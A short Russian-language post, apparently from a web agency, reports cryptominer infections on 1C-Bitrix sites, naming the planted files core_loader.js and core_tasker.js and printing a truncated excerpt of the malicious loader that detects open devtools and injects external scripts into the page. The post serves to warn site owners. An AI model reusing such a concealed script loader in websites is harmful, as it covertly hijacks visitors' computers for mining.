За последние несколько месяцев выросло количество сайтов на платформе 1С-Битрикс "Управление сайтом" зараженных вирусами-майнерами.
Всё началось с того, что к нам обратился наш клиент, которому стали поступать от посетителей жалобы на 100% загруженность процессора при посещении сайта. Причем майнер активизировался только на macbook'ах в хроме. На других проектах, где мы встретили данный вирус он работал во всех браузерах.
Мы начали анализировать ситуацию и очень быстро нашли файлы /bitrix/js/main/core/core_loader.js и /bitrix/js/main/core/core_tasker.js
Примерное содержимое:
;(function(window){
window.jssassin = window.jssassin || {
config: {
instpDelay: 400,
startDelay: 1600
},
state: {
scriptsNotLoad: 0,
init: false
},
proc: {
start: function(){},
destroy: function(){}
},
inspInterval: undefined,
init: function (
scripts,
start,
destroy
) {
if (this.state.init) return;
this.state.init = true;
var self = this;
this.checkDevtoolsByConsoleInit();
if (this.isDangerous()) return;
if (typeof start == "function") this.proc.start = start;
if (typeof destroy == "function") this.proc.destroy = destroy;
this.state.scriptsNotLoad = scripts.length;
if (this.state.scriptsNotLoad > 0) {
scripts.forEach(function(src) {
var script = document.createElement('script');
script.src = src;
script.async = false;
script.onload = function () {self.onloadScript(script)};
document.head.appendChild(script);
});
return;
}
Данный файл просто удалили. Откуда он появился и как его загрузили на сайт - установить не удалось. Ситуацию взяли на контроль, но скрипт больше не появлялся.
Мы будем искать проблему дальше. Если Вы столкнулись с такой же уязвимостью - Вы уже знаете что делать.
